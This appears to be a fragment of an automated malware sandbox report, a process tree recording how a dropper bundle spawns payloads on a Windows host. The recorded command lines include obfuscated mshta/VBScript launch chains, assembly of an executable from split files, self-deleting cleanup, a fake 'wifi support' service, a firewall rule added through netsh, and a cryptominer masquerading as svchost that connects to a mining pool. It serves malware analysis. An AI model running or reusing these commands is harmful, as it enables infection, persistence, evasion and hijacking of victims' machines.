                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:1964
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7244688.scr
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7244688.scr" /S
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:1712
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8248303.scr
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8248303.scr" /S
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                        PID:1852
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:4108
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6049715.scr
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6049715.scr" /S
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        PID:1552
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2542790.scr
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2542790.scr" /S
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        PID:4376
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1094676.scr
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\1094676.scr" /S
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:4520
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                    PID:2136
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                      Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:2140
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:5504
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:5888
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                      PID:2112
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu16466b26f8b7.exe
                                                                                                                                                                                                        Thu16466b26f8b7.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                        PID:860
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:3008
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu16f3de88a335950bb.exe
                                                                                                                                                                                                          Thu16f3de88a335950bb.exe
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:3700
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DMSN5.tmp\Thu16f3de88a335950bb.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DMSN5.tmp\Thu16f3de88a335950bb.tmp" /SL5="$301D6,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu16f3de88a335950bb.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:2724
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu16f3de88a335950bb.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu16f3de88a335950bb.exe" /SILENT
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:3236
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-20DD2.tmp\Thu16f3de88a335950bb.tmp
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-20DD2.tmp\Thu16f3de88a335950bb.tmp" /SL5="$30086,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu16f3de88a335950bb.exe" /SILENT
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                PID:2448
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-O2UAM.tmp\postback.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-O2UAM.tmp\postback.exe" ss1
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4896
                                                                                                                                                                                                                • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4936
                                                                                                                                                                                                                • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                                  • C:\698f3bb3acfb60eb3675\Setup.exe
                                                                                                                                                                                                                    C:\698f3bb3acfb60eb3675\\Setup.exe /q /norestart /x86 /x64 /web
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                    PID:4116
                                                                                                                                                                                                                    • C:\698f3bb3acfb60eb3675\SetupUtility.exe
                                                                                                                                                                                                                      SetupUtility.exe /aupause
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:1432
                                                                                                                                                                                                                    • C:\698f3bb3acfb60eb3675\SetupUtility.exe
                                                                                                                                                                                                                      SetupUtility.exe /screboot
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:6004
                                                                                                                                                                                                                    • C:\Windows\System32\dism.exe
                                                                                                                                                                                                                      dism.exe /quiet /norestart /online /add-package /packagepath:"C:\698f3bb3acfb60eb3675\Windows10.0-KB4054590-x64.cab"
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      PID:7000
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C58AD661-E1A6-437C-9B6B-EFD08F9DC1D7\dismhost.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\C58AD661-E1A6-437C-9B6B-EFD08F9DC1D7\dismhost.exe {57E9D1BA-84B1-4786-88FA-2B79062D2D52}
                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        PID:5216
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3852
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu1653d94a8da.exe
                                                                                                                                                                                                            Thu1653d94a8da.exe
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:2068
                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu1653d94a8da.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:3892
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu1653d94a8da.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu1653d94a8da.exe" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:4672
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                                      09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5012
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:5112
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:4124
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                              PID:3384
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:3288
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:5044
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:424
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                        control .\R6f7sE.I
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                          PID:5144
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:2992
                                                                                                                                                                                                                                            • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                PID:5428
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:6136
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill /F -Im "Thu1653d94a8da.exe"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:3924
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu164ba03be19.exe
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                              PID:2992
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu164ba03be19.exe
                                                                                                                                                                                                                                Thu164ba03be19.exe
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                PID:2444
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu164ba03be19.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu164ba03be19.exe
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:1960
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                              PID:2408
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu16f584bd3686.exe
                                                                                                                                                                                                                                Thu16f584bd3686.exe
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:3176
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                              PID:1928
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                                Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                PID:2152
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im Thu1628aafb3efd7c3d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu1628aafb3efd7c3d.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill /im Thu1628aafb3efd7c3d.exe /f
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:6084
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                      PID:3288
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:1508
                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:4020
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                              PID:4320
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2204
                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 2204 -s 496
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5300
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                              Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4008
                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                              PID:4916
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                PID:5024
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BBB0.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BBB0.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:1508
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DEB5.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\DEB5.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:5856
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DEB5.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\DEB5.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                PID:4756
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E7ED.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\E7ED.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:1200
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E7ED.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E7ED.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:6764
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E7ED.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E7ED.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:6068
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E7ED.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E7ED.exe
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:4160
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8A5.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\8A5.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2352
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dxdqdkvc\
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:11188
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\adwecemw.exe" C:\Windows\SysWOW64\dxdqdkvc\
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:11340
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" create dxdqdkvc binPath= "C:\Windows\SysWOW64\dxdqdkvc\adwecemw.exe /d\"C:\Users\Admin\AppData\Local\Temp\8A5.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:11440
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" description dxdqdkvc "wifi internet conection"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:11692
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" start dxdqdkvc
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:12200
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4172
                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:3628
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\29EA.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\29EA.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:10084
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\dxdqdkvc\adwecemw.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\dxdqdkvc\adwecemw.exe /d"C:\Users\Admin\AppData\Local\Temp\8A5.exe"
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:11140
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                      svchost.exe
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                      PID:11812
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:7172
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4235.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4235.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:11328
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                        PID:11332
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\52D0.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\52D0.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                        PID:11596
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 52D0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\52D0.exe" & del C:\ProgramData\*.dll & exit
